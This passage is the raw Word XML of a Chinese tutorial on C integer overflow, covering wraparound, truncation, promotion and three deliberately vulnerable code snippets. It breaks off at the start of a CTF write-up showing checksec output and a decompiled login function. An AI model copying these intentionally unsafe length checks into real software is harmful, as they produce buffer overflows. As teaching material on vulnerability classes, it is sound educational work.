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r>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n396">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">整数溢出介绍</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n429">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">整数溢出原理</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n451">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">有符号整数溢出</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n461">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">无符号整数回绕</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n464">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">截断</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n473">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">整数提升和宽度溢出</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n482">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">漏洞多发函数</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">	</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n485">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">整数溢出示例</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n487">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">示例一：整数转换：</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n490">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">示例二：回绕和溢出：</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n493">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">示例三：截断：</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">		</w:t>
      </w:r>
      <w:hyperlink w:anchor="header-n496">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">示例四：功放世界：int_overflow</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="header-n396"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">整数溢出介绍</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">C语言中整数的分类及各自的大小范围：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范围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 int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2byte(word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0~32767(0~0x7fff) -32768~-1(0x8000~0xffff)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unsigned short int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2byte(word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0~65535(0~0xffff)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4byte(word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xffffffff)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unsigned int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4byte(word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0~4294967295(0~0xffffffff)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8byte(word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">正: 0~0x7fffffffffffffff 负: 0x8000000000000000~0xffffffffffffffff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unsigned long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8byte(word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0~0xffffffffffffffff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">正是因为这些类型的大小范围的限制导致整数溢出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="27" w:name="header-n429"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">整数溢出原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">整数溢出的异常有3种：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">只有有符号数才会发生溢出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">溢出标志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">可检测有符号数的溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">回绕</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">无符号数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">0-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">时会变成最大的书，1字节的话会变为255，255+1时会变为0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">进位标志</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">可检测无符号数的回绕</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">截断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">就是将一个较大宽度的数放入一个宽度较小的数中，高位发生截断</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="header-n451"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">有符号整数溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">分为上溢出和下溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">上溢出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2147483647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//int的最大值</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i++;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,i);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//输出为最小负数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1006"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">下溢出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-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2147483648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//int的最小值</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i--;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,i);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//输出为最大正数</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="header-n461"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">无符号整数回绕</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">无符号数的计算不会溢出，但是会发生回绕</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unsined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//x86-32上为4 294 967 295</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">i++;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,i);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//输出为0</w:t>
      </w:r>
      <w:r>
        <w:br/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i--;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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,i);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//输出为4 294 967 295</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="header-n464"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">截断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1007"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">加法截断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffffff + 0x00000001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">= 0x0000000100000000 (long long)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">= 0x00000000 (long)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">乘法截断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00123456 * 0x00654321</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">= 0x000007336BF94116 (long long)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">= 0x6BF94116 (long)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="header-n473"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">整数提升和宽度溢出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">看代码：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l;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c;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    l = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xabcddcba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 = l;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    c = l;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"宽度溢出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"l = 0x%x (%d bits)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(l) *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"s = 0x%x (%d bits)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(s) *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"c = 0x%x (%d bits)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(c) *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"整型提升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"s + c = 0x%x (%d bits)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s+c,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(s+c) *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OUT：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$ ./a.out</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">宽度溢出</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">l = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xabcddcba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bits)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffdcba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bits)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">c = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffffba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bits)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">整型提升</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s + c = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xffffdc74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bits)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">在整数转换的过程中，有可能导致下面的错误：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">损失值：转换为值的大小不能表示的一种类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">损失符号：从有符号类型转换为无符号类型，导致损失符号</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="header-n482"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">漏洞多发函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">下面的两个函数都有一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">size_t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">类型的参数，常常被误用而产生整数溢出，接着就可能导致缓冲区溢出漏洞。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*memcpy(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*dest,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*src,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*strncpy(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*dest,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*src,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n);</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkStart w:id="32" w:name="header-n485"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">整数溢出示例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">下面用3个示例来演示：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="header-n487"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">示例一：整数转换：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vulnerable()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read_int_from_network();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 = read_string_from_network();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 &gt;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error(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"length too large: bad dog, no cookie for you!"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memcpy(buf, p, len);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在这里，如果给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">赋值一个负数，就可以绕过if判断，但是到memcpy时，因为第三个参数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">size_t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">类型，负数的len会被认为是一个很大的正数，从而复制大量内容到buf，导致缓存区溢出。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="header-n490"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">示例二：回绕和溢出：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vulnerable()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len;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buf;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    len = read_int_from_network();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    buf = malloc(len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read(fd, buf, len);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相较于上一个例子，这个例子避开来缓冲区溢出的问题，但是如果len很大时，len+5会回绕，比如，若是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">len = 0xFFFFFFFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">len + 5 = 0x00000004</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，这时只malloc了4个字节，然而之后会read大量数据，缓冲区溢出也会发生。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="header-n493"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">示例三：截断：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*argv[])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total;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    total = strlen(argv[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+ strlen(argv[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*buf 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*)malloc(total);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    strcpy(buf, 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strcat(buf, argv[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这个例子计算了输入参数的长度为total，程序分配了内存来存拼接后的字符串。这里total的类型为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">unsigned short int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">，如果攻击者提供的两个字符串总长度无法用total表示，则会发生截断，从而导致后面的缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31" w:name="header-n496"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">示例四：功放世界：int_overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">yutao@pwnbaby:~/Desktop$ file int_overflow </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">int_overflow: ELF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-bit LSB executable, Intel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">80386</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, version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(SYSV), dynamically linked, interpreter /lib/ld-linux.so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GNU/Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, BuildID[sha1]=aaef797b1ad6698f0c629966a879b42e92de3787, not stripped</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">yutao@pwnbaby:~/Desktop$ checksec int_overflow</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] '/home/yutao/Desktop/int_overflow'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Arch:     i386-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-little</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    RELRO:    Partial RELRO</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Stack:    No canary found</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    NX:       NX enabled</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    PIE:      No PIE (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x8048000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关键函数：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*login()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buf; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// [esp+0h] [ebp-228h]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s; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// [esp+200h] [ebp-28h]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memset(&amp;s,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0x20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memset(&amp;buf,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0x200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puts(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Please input your username:"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read(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&amp;s, </w:t>
